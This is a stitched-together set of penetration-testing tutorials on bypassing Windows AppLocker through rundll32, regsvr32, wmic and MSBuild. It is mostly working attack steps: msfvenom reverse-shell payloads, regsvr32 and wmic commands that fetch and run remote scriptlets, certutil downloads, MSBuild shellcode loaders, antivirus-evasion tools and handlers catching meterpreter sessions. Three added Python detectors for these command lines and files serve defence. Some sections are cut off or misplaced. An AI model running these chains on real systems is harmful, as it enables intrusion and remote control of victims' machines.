Table of Contents
- Introduction
- Working of DLL files
- Advantages
- Disadvantages
- Different methods for AppLocker Bypass using DLL files
- Conclusion
Working
When in use, a DLL is divided into sections, which makes DLL handling simpler and faster. Each section is loaded into the main program at run time; because the sections are separate and independent, load time is shorter and a section is loaded only when its functionality is actually required. This also makes upgrades easier to apply without affecting the other sections. For example, if you have a dictionary program to which new words are added every month, you only need to update the dictionary DLL rather than install a whole new program.
Advantages
- Uses fewer resources
- Promotes modular architecture
- Eases deployment and installation
Disadvantages
Dependency problems arise when a program uses a DLL that other programs also depend on, for example when:
- A dependent DLL is upgraded to a new version.
- A dependent DLL is fixed.
- A dependent DLL is overwritten with an earlier version.
- A dependent DLL is removed from the computer.
Different methods for AppLocker Bypass using DLL files
- Smb_Delivery
- MSFVenom
- Koadic
- Get-Command Prompt via cmd.dll
- JSRat
Smb_Delivery
Our first method uses the smb_delivery module. To use it, open a terminal in Kali and type the following commands:
msfconsole
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit
Now run the malicious DLL through rundll32.exe on the Windows machine to obtain a meterpreter session.
rundll32.exe \\192.168.1.107\ZtmW\test.dll,0
As soon as the command is executed, you will have your meterpreter session. To access the session, type:
sessions 1
sysinfo
MSFVenom
Our second method is via MSFVenom. To use it, type the following command in the Kali terminal:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll
Then run the generated DLL on the Windows machine with:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll
Simultaneously, start the multi/handler to catch the session by typing:
msfconsole
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
Koadic
Our next method uses the Koadic framework. Koadic is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run
Once you run the stager command in cmd, you will have your session, as shown in the following image. To access the session, type:
zombies 0
Get-Command Prompt via cmd.dll
If the command line is blocked, there is a script developed by Didier Stevens that solves that little problem. You can find it at the following link:
https://didierstevens.com/files/software/cmd-dll_v0_0_4.zip
The URL above downloads a zip file. Extract it and use the following command in the Run window to run the DLL:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll
As soon as you run the command, you will have an unblocked cmd, as shown below:
JSRat
Our next method uses JSRat, which you can download from GitHub. This is another command and control framework, like Koadic and PowerShell Empire, for generating malicious tasks specifically for rundll32.exe and regsvr32.exe. JSRat creates a web server on which we will find our .js file. To use this method, type:
./JSRat.py -i 192.168.1.107 -p 4444
Next, open the link http://192.168.1.107/wtf in your browser. There you will find the said code, as shown in the image below:
And voila, you will have a session, as in the image below:
Conclusion
DLL files are collections of code and procedures held together in one file. They help Windows programs execute correctly, and they were designed so that multiple programs can use them simultaneously, which conserves memory. These files are therefore important and required for Windows to run properly without giving users any kind of problem, and that is exactly why exploitation through such files is so efficient and lethal. The methods presented above are different ways of doing it.
Windows Applocker Policy - A Beginner's Guide
Table of Contents
- Introduction to regsvr
- Working of regsvr
- Multiple methods to attack regsvr
Working
When you register a DLL with regsvr32, information about the programs associated with it is added to Windows. These entries are then consulted to find where the program's data is and how to interact with it. While registering a DLL, information is added to a central directory so that Windows can use it. The path recorded for these files points to the actual executable code, and through these entries Windows can call specific functions. They are very convenient because when software is updated they automatically refer to the updated version; in short, they help avoid software version problems. Usually regsvr32 is not used for anything other than registering and unregistering DLL files.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>
To know more about it, visit here: https://support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages
Multiple Methods
- Web delivery
- Empire
- Manual
- MSFVenom
- Koadic
- JSRat
- GreatSCT
Web Delivery
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit
Copy the highlighted text shown in the image below:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
PowerShell Empire
@harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the Empire framework is started, type listeners to check whether there are any active listeners. As you can see in the image below, there are none. To set up a listener, type:
uselistener http
set Host http://192.168.1.109
execute
With the above commands, you will have an active listener. Type back to leave the listener menu so you can move on to the stager.
Once you are out of the listener menu, you need a stager to create your malicious file. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. To create one we use usestager. Therefore, type:
usestager windows/launcher_sct
set listener http
execute
After the command executes, usestager creates launcher.sct in /tmp. Now, to get a session, start a Python web server by typing:
python -m SimpleHTTPServer 8080
Then, on the Windows machine, run:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
In the above command we used port 8080 because the Python server is listening on that port.
Once the above is executed as described, you will receive a session. To access the session, type:
interact 9ATUX4M7
9ATUX4M7 is the agent/session name; it will vary from session to session.
Inject PowerShell code in sct File (Manual Method)
Running the following exploit will show you the PowerShell code on the terminal screen, as in the image below:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit
Copy the highlighted text shown below:
Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder on Windows XP and later versions of Windows.
Now we need to create a .sct file for our attack to run. We found a script online that creates a .sct file. You can access the link for the script by clicking here. The script is shown in the image below:
regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll
MSFVenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
Start up the python server using the following command:
python -m SimpleHTTPServer 80
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe
We used certutil here because it allows a file to be downloaded on Windows; this script was saved as 3.sct.
Now run the above script using the following command:
regsvr32 /u /n /s /i:http://192.168.1.109/3.sct scrobj.dll
cmd /k cd c:\Users\raj & shell.exe
We saved this script as 4.sct and again ran it using the following command:
regsvr32 /u /n /s /i:http://192.168.1.109/4.sct scrobj.dll
Simultaneously, start the multi handler to catch the session. For this, type:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
Koadic
Our next method uses Koadic. Koadic is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/regsvr
set srvhost 192.168.1.107
run
regsvr32 /u /n /s /i:http://192.168.1.107:9998/uWBjv scrobj.dll
Once you run the above command, you will have a session. To access the session, type:
zombies 0
JSRat
Our next method of attacking through regsvr32 uses JSRat, which you can download from GitHub. This is another very small command and control framework, like Koadic and PowerShell Empire, for generating malicious tasks specifically for rundll32.exe and regsvr32.exe. JSRat creates a web server on which we will find our .sct file. To use this method, type:
./JSRat.py -i 192.168.1.107 -p 4444
Running the above command starts the web server.
Once we have the command, run it in the Run window as shown in the image below:
After executing the command in the Run window, you will have a session, as shown:
GreatSCT
GreatSCT is a tool that lets you use Metasploit payloads while bypassing most anti-virus products. GreatSCT is currently maintained by @ConsciousHacker. You can download it from:
https://github.com/GreatSCT/GreatSCT
use Bypass
A list of modules will appear, as shown in the image below:
From the list of modules, choose the following:
use regsvr/shellcode_inject/base64_migrate.py
generate
After the above commands, type 1 to choose MSFVenom.
Then it will ask you for a payload; just press Enter, as it takes windows/meterpreter/reverse_tcp as the default payload, which is the one we need. After that, provide the IP (here we gave 192.168.1.107) and a port of your choice (in the image below we gave lport 2345).
As soon as you press Enter, it generates two files: one is a resource file and the other a .sct file.
Serve the generated .sct file with a Python web server:
python -m SimpleHTTPServer 80
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And you have a meterpreter session.
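From the defender's side, both the rundll32 techniques in the first part of this page and the regsvr32 techniques above leave a distinctive process-creation command line: rundll32 loading a DLL from a UNC share or a user-writable folder, and regsvr32 called with /i: pointing at an http(s) scriptlet together with scrobj.dll. The Python script below is an added example, not code from the original articles or from Metasploit, Koadic, Empire, JSRat or GreatSCT. The event records are constructed to resemble Sysmon Event ID 1 fields (Image and CommandLine), and the rule names are my own.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (Image + CommandLine). The first four mirror the command lines shown in the
# rundll32 and regsvr32 sections above; the last two are benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.168.1.107\ZtmW\test.dll,0"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll"},
    # Benign: opening a Control Panel applet, the documented use of Control_RunDLL
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\desk.cpl"},
    # Benign: an installer silently registering a COM server under Program Files
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
]

# \\host\share\... : a DLL pulled straight off a remote SMB share
UNC_PATH = re.compile(r"(?:^|\s)\\\\[\w.-]+\\", re.I)
# Locations an unprivileged user can write to, where a dropped DLL would live
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Downloads|Desktop|Documents|AppData)\\|\\Temp\\|\\ProgramData\\",
    re.I)
# regsvr32 /i: with an http(s) target: the scriptlet is fetched over the network
REMOTE_SCRIPTLET = re.compile(r'/i:\s*"?https?://', re.I)


def rundll32_rules(cmd):
    """Rule names that fire for a rundll32 command line."""
    hits = []
    if UNC_PATH.search(cmd):
        hits.append("rundll32_dll_from_unc_path")
    if USER_WRITABLE.search(cmd):
        hits.append("rundll32_dll_from_user_writable_dir")
    return hits


def regsvr32_rules(cmd):
    """Rule names that fire for a regsvr32 command line."""
    hits = []
    if REMOTE_SCRIPTLET.search(cmd):
        hits.append("regsvr32_remote_scriptlet")
    if "scrobj.dll" in cmd.lower():
        hits.append("regsvr32_scrobj_dll")
    return hits


RULES = {"rundll32.exe": rundll32_rules, "regsvr32.exe": regsvr32_rules}


def analyze(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        binary = ev["Image"].rsplit("\\", 1)[-1].lower()
        for rule in RULES.get(binary, lambda _cmd: [])(ev["CommandLine"]):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Both benign records produce no findings, which is the point of writing the rules around the DLL's origin rather than around the binary name: rundll32 and regsvr32 are used legitimately all day. AppLocker's default executable rules allow everything under the Windows folder, which is why these signed system binaries run at all; the mitigations are explicit deny rules for them for non-administrative users, or AppLocker DLL rules so that test.dll and 1.dll are blocked by their own path, combined with command-line logging (Sysmon, or event 4688 with command-line auditing enabled) so that checks like the ones above have something to read.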
Conclusion
Table of Contents
Introduction to Wmic.exe
Exploiting Techniques
- Koadic
- Powershell Empire
- Link hta within XSL code
The WMIC utility is a Microsoft tool that provides a WMI command-line interface for a variety of administrative functions on local and remote machines, such as querying system settings, stopping processes and running scripts locally or remotely. Among other things, it can invoke XSL (eXtensible Stylesheet Language) scripts.
Exploiting Techniques
Koadic
We will generate a malicious XSL file with the help of Koadic, a command and control tool quite similar to Metasploit and PowerShell Empire.
To learn how Koadic works, read our article here: https://www.hackingarticles.in/koadic-com-command-control-framework/
Once the installation is complete, run ./koadic to start Koadic, then load the stager/js/wmic stager with the following commands and set SRVHOST to the address the stager should call home to.
use stager/js/wmic
set SRVHOST 192.168.1.107
run
Execute the following WMIC command to download and run the malicious XSL file from the remote server:
wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"
Once the malicious XSL file executes on the target machine, you will have a zombie connection, much like a Metasploit session.
PowerShell Empire
https://github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire:
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the Empire framework is started, type listeners to check whether there are any active listeners. As you can see in the image below, there are none. To set up a listener, type:
listeners
uselistener http
set Host http://192.168.1.107
execute
With the above commands, you will have an active listener. Type back to leave the listener menu so that you can move on to the stager:
usestager windows/launcher_xsl
set Listener http
execute
Usestager creates a malicious code file saved in /tmp as launcher.xsl. Serve it over HTTP and run it on the target with:
wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"
interact Z639YHPA
sysinfo
Link hta within XSL code
As we know, wmic can execute a file or script remotely, so we will link an hta file within the XSL code. The XSL file will contain a link that downloads and executes a malicious hta file via mshta.exe, triggered by wmic.
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Now copy the URL and place it inside the XSL code, because XSL files can execute Microsoft scripting languages.
link for writing XSL code, and then place the link of the hta file as shown below.
Now we again need to execute the XSL file through wmic.exe with the following command:
wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"
Once the above command is executed, you will have a session open. To access the session, type:
sessions 1
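The wmic /format: technique above works only because the MSXML XSLT engine honours the Microsoft ms:script extension element, so the stylesheet itself can carry JScript or VBScript. A defender can therefore inspect any .xsl that wmic fetched (from a proxy log, a sandbox, or the file system) for script elements instead of relying on the command line alone. The scanner below is an added example, not code from the article, Koadic or Empire; both stylesheets are constructed, the launcher-shaped one keeps only the structure of such a file, and its script body is a harmless placeholder.

```python
import xml.etree.ElementTree as ET

MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"       # namespace that carries ms:script
XSLT_NS = "http://www.w3.org/1999/XSL/Transform"

# Constructed stylesheet in the shape of a wmic /format: launcher: an ms:script
# block instead of any real transform. The body is a placeholder, not a payload.
LAUNCHER_SHAPED_XSL = """<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
  <![CDATA[
    var note = "constructed placeholder, no payload";
  ]]>
  </ms:script>
</stylesheet>
"""

# Constructed benign stylesheet: a plain text transform with no script extension.
BENIGN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:value-of select="//Caption"/>
  </xsl:template>
</xsl:stylesheet>
"""


def _split_tag(tag):
    """'{ns}local' -> ('ns', 'local'); 'local' -> ('', 'local')."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def find_script_blocks(xsl_text):
    """Every script element in the stylesheet, whatever prefix it was given.

    Returns a list of dicts; an empty list means no embedded script was found.
    Malformed XML is reported as a finding of its own: wmic would not run it,
    but an analyst should still look at why it was fetched.
    """
    try:
        root = ET.fromstring(xsl_text)
    except ET.ParseError as err:
        return [{"error": str(err)}]
    findings = []
    for el in root.iter():
        ns, local = _split_tag(el.tag)
        if local.lower() == "script":          # matches ms:script, msxsl:script, ...
            findings.append({
                "namespace": ns,
                "language": el.get("language", ""),
                "prefix": el.get("implements-prefix", ""),
            })
    return findings


def is_script_bearing_stylesheet(xsl_text):
    """True when the document is an XSLT stylesheet that embeds script."""
    try:
        root = ET.fromstring(xsl_text)
    except ET.ParseError:
        return False
    ns, local = _split_tag(root.tag)
    if not (ns == XSLT_NS and local == "stylesheet"):
        return False
    return any("error" not in block for block in find_script_blocks(xsl_text))


if __name__ == "__main__":
    for name, doc in (("launcher-shaped", LAUNCHER_SHAPED_XSL), ("benign", BENIGN_XSL)):
        print(name, is_script_bearing_stylesheet(doc), find_script_blocks(doc))
```

The check keys on the element's local name rather than on the ms: prefix, because the prefix is chosen by the author of the file and only the namespace URI is fixed. On the process side, a wmic command line whose /format: argument is an http(s) URL is itself worth an alert, and wmic.exe appears on Microsoft's recommended WDAC block list for exactly this reason.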
Table of Contents
Introduction to MSbuild.exe
Exploiting Techniques
- Generate CSharp file with Msfvenom
- Generate XML file to Exploit MSbuild
- Nps_payload Script
- Powershell Empire
- GreatSCT
The Microsoft Build Engine is a platform for building applications. This engine is also known as MSBuild (msbuild.exe).
Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.
Exploiting Techniques:
Generate CSharp file with Msfvenom
We use Microsoft Visual Studio to create a C# (C Sharp) project with a .csproj suffix, saved in MSBuild format so that it can be compiled by the MSBuild platform into an executable program.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp
The shellcode generated above should be placed in the XML file, which you can download from GitHub; it contains the code that MSBuild compiles and executes. This XML file should be saved as file.csproj and must be run via MSBuild to get a Meterpreter session.
Note: replace the shellcode value with your C# shellcode and then rename buf to shellcode, as shown in the image below.
You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework.
For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.
To know more about MSBuild, read: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015
Now launch the multi handler to catch the meterpreter session, and run file.csproj with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319, as shown.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj
Note: you need to save your malicious payload (XML / csproj) at this location: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute the file from the command prompt.
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
As you can observe, we have the meterpreter session of the victim as shown below:
Generate XML file to Exploit MSBuild
As mentioned above, MSBuild uses an XML-based project file format that is straightforward and extensible, so we can rename the generated file.csproj to file.xml and again run file.xml with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319, as shown.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
As you can observe, we have the meterpreter session of the victim as shown below:
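Whether the file is called file.csproj or file.xml, MSBuild only looks at the XML: a Project root in the MSBuild namespace with a UsingTask whose TaskFactory is CodeTaskFactory (or RoslynCodeTaskFactory on newer toolsets) compiles and runs the inline C# in its Code element during the build, which is what the launcher files described above rely on. The scanner below is an added example, not code from the article, the GitHub XML template, or Empire; the MSBuild namespace and factory names are real, both project files are constructed, and the inline task body is a harmless placeholder.

```python
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
# Task factories that compile source embedded in the project file at build time
INLINE_TASK_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}

# Constructed project file with the shape of an inline-task launcher; the
# C# body is a placeholder that does nothing, not a payload.
INLINE_TASK_PROJECT = """<?xml version="1.0"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <PlaceholderTask />
  </Target>
  <UsingTask TaskName="PlaceholderTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
        using Microsoft.Build.Utilities;
        public class PlaceholderTask : Task { public override bool Execute() { return true; } }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
"""

# Constructed ordinary C# project: compiles sources, defines no inline task.
ORDINARY_PROJECT = """<?xml version="1.0"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup><OutputType>Exe</OutputType></PropertyGroup>
  <ItemGroup><Compile Include="Program.cs" /></ItemGroup>
  <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />
</Project>
"""


def _local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rpartition("}")[2]


def is_msbuild_project(text):
    """True if the XML root is <Project> in the MSBuild namespace, whatever the file extension."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return False
    return root.tag == "{%s}Project" % MSBUILD_NS


def scan_project(text):
    """Findings for constructs that run arbitrary code as a side effect of a build."""
    findings = []
    if not is_msbuild_project(text):
        return findings
    root = ET.fromstring(text)
    for el in root.iter():
        name = _local(el.tag)
        if name == "UsingTask":
            factory = el.get("TaskFactory", "")
            if factory.lower() in INLINE_TASK_FACTORIES:
                languages = [c.get("Language", "cs") for c in el.iter() if _local(c.tag) == "Code"]
                findings.append({"kind": "inline_task", "task": el.get("TaskName", ""),
                                 "factory": factory, "languages": languages})
        elif name == "Exec":
            # <Exec Command="..."/> runs a shell command during the build
            findings.append({"kind": "exec_task", "command": el.get("Command", "")})
    return findings


if __name__ == "__main__":
    for label, doc in (("inline-task", INLINE_TASK_PROJECT), ("ordinary", ORDINARY_PROJECT)):
        print(label, is_msbuild_project(doc), scan_project(doc))
```

Inline tasks are a legitimate MSBuild feature, so the scanner is for triage of files found where no build should be happening (a Downloads folder, a Framework directory, a file opened by MSBuild.exe on a workstation with no Visual Studio) rather than for blocking builds. Because MSBuild.exe is a signed binary under the Windows folder, AppLocker's default rules allow it; Microsoft's recommended WDAC block list includes msbuild.exe, and an AppLocker deny rule for it for non-developer users is the equivalent mitigation.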
Nps_Payload Script
This script generates payloads for basic intrusion detection avoidance, using publicly demonstrated techniques from several different sources. It was written by Larry Spohn (@Spoonman1091), with the payload written by Ben Mauch (@Ben0xA), aka dirty_ben. You can download it from GitHub.
Follow the steps below to generate the payload:
- Run the ./nps_payload.py script once you have downloaded nps_payload from GitHub.
- Press key 1.
Then start the handler with the generated resource file:
msfconsole -r msbuild_nps.rc
Now repeat the earlier step to execute msbuild_nps.xml from the command prompt and obtain a reverse connection via meterpreter, as shown below:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml
PowerShell Empire
https://github.com/EmpireProject/Empire.
To have a basic guide of Empire, please visit our article introducing empire:
Once the Empire framework is started, type listeners to check whether there are any active listeners. As you can see in the image below, there are none. To set up a listener, type:
listeners
uselistener http
set Host http://192.168.1.107
execute
With the above commands, you will have an active listener. Type back to leave the listener menu so that you can move on to the stager.
For our MSBuild attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. For this, type:
usestager windows/launcher_xml
set Listener http
execute
Usestager creates a malicious code file saved in /tmp as launcher.xml. Run it on the target with:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml
interact A8H14C7L
The above command gives you access to the session.
sysinfo
GreatSCT
GreatSCT is a tool that lets you use Metasploit payloads while bypassing most anti-virus products. GreatSCT is currently maintained by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT
use Bypass
Now, to see the list of payloads, type:
list
From the list of payloads you can choose any one for your desired attack, but for this attack we will use:
use msbuild/meterpreter/rev_tcp.py
Once the command is executed, type:
set lhost 192.168.1.107
generate
Now it has made two files: a Metasploit RC file and an msbuild.xml file. Serve msbuild.xml with a Python web server:
python -m SimpleHTTPServer 80
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! We have a meterpreter session, as shown here.
Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017